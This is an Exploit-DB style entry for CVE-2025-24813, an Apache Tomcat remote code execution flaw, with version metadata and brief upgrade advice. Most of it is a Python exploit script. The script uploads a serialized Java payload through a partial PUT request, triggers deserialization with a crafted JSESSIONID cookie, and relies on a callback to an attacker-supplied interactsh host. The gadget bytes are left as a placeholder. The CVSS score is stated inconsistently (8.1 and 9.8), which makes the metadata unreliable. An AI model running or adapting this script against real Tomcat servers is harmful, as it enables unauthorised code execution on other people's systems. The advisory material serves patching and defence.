Apache Tomcat Path Equivalence - Remote Code Execution

vendor:

Apache Tomcat

by:

Al Baradi Joy

8.1

CVSS

CRITICAL

Path Equivalence - Remote Code Execution

44, 502

CWE

Product Name: Apache Tomcat

Affected Version From: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98

Affected Version To: 11.0.3 / 10.1.35 / 9.0.98

Patch Exists: YES

Related CWE: CVE-2025-24813

CPE: a:apache:tomcat

Metasploit:

Other Scripts:

Platforms Tested: Apache Tomcat 10.1.33

2025

Apache Tomcat Path Equivalence – Remote Code Execution

The exploit allows remote attackers to execute arbitrary code on the target system by uploading a malicious payload to a specific URL and triggering it through a crafted request. This vulnerability is identified as CVE-2025-24813 affecting Apache Tomcat versions prior to 11.0.3, 10.1.35, and 9.0.98.

Mitigation:

To mitigate this vulnerability, it is recommended to update Apache Tomcat to version 11.0.3, 10.1.35, or 9.0.98 or later. Additionally, restrict access to the affected URLs and implement strong input validation.

Source

Exploit-DB raw data:

# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
# Exploit Author: Al Baradi Joy
# CVE: CVE-2025-24813
# Date: 2025-04-06
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-90.cgi
# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
# Tested on: Apache Tomcat 10.1.33
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-44, CWE-502
# Reference:
https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html

import requests
import random
import string
import sys

def rand_filename(length=6):
    return ''.join(random.choices(string.ascii_lowercase, k=length))

def generate_payload(interact_url):
    # Java serialized payload gadget triggering DNS interaction
    return f'\xac\xed\x00\x05...'  # Replace with actual gadget bytes or
generator

def exploit(target, interact_url):
    filename = rand_filename()
    put_url = f"{target}/{filename}.session"
    get_url = f"{target}/{filename}"
    headers = {
        "Content-Range": "bytes 0-452/457",
        "Content-Type": "application/octet-stream"
    }
    payload = generate_payload(interact_url)

    print("[+] Exploit for CVE-2025-24813")
    print("[+] Made By Al Baradi Joy\n")
    print(f"[+] Uploading payload to: {put_url}")
    r1 = requests.put(put_url, data=payload, headers=headers)
    if r1.status_code == 201:
        print("[+] Payload uploaded successfully.")
    else:
        print(f"[-] Upload failed with status: {r1.status_code}")
        return

    print(f"[+] Triggering payload via: {get_url}")
    cookies = {"JSESSIONID": f".{filename}"}
    r2 = requests.get(get_url, cookies=cookies)
    print(f"[+] Trigger request sent. Check for DNS callback to:
{interact_url}")

if __name__ == "__main__":
    # Display banner first
    print("[+] Exploit for CVE-2025-24813")
    print("[+] Made By Al Baradi Joy\n")

    # Ask the user for the target domain and interact URL
    target_url = input("Enter the target domain (e.g., http://localhost:8080):
")
    interact_url = input("Enter your interactsh URL: ")

    exploit(target_url, interact_url)